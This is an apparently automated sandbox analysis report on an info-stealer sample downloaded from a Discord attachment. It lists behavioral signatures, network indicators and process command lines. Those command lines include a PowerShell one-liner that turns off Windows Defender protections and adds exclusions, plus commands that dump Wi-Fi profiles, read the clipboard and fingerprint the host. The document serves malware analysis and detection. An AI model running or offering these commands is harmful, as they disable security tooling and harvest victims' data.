Analysis Overview
Threat Level: Likely malicious
The file https://cdn.discordapp.com/attachments/1237910600949174314/1237910688165265408/notaloggertrustmebro.exe?ex=663d5dab&is=663c0c2b&hm=a504c550ad08bda5e8c4ee8e10454fc6da33d63ebfe478c1ead62c4a0c58df5b& was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Drops startup file
UPX packed file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Detects Pyinstaller
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Detects videocard installed
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
NTFS ADS
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-08 23:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-08 23:37
Reported
2024-05-08 23:39
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 904369.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\notaloggertrustmebro.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1237910600949174314/1237910688165265408/notaloggertrustmebro.exe?ex=663d5dab&is=663c0c2b&hm=a504c550ad08bda5e8c4ee8e10454fc6da33d63ebfe478c1ead62c4a0c58df5b&
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee9a746f8,0x7ffee9a74708,0x7ffee9a74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5948 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
C:\Users\Admin\Downloads\notaloggertrustmebro.exe
"C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
C:\Users\Admin\Downloads\notaloggertrustmebro.exe
"C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\notaloggertrustmebro.exe
"C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
C:\Users\Admin\Downloads\notaloggertrustmebro.exe
"C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
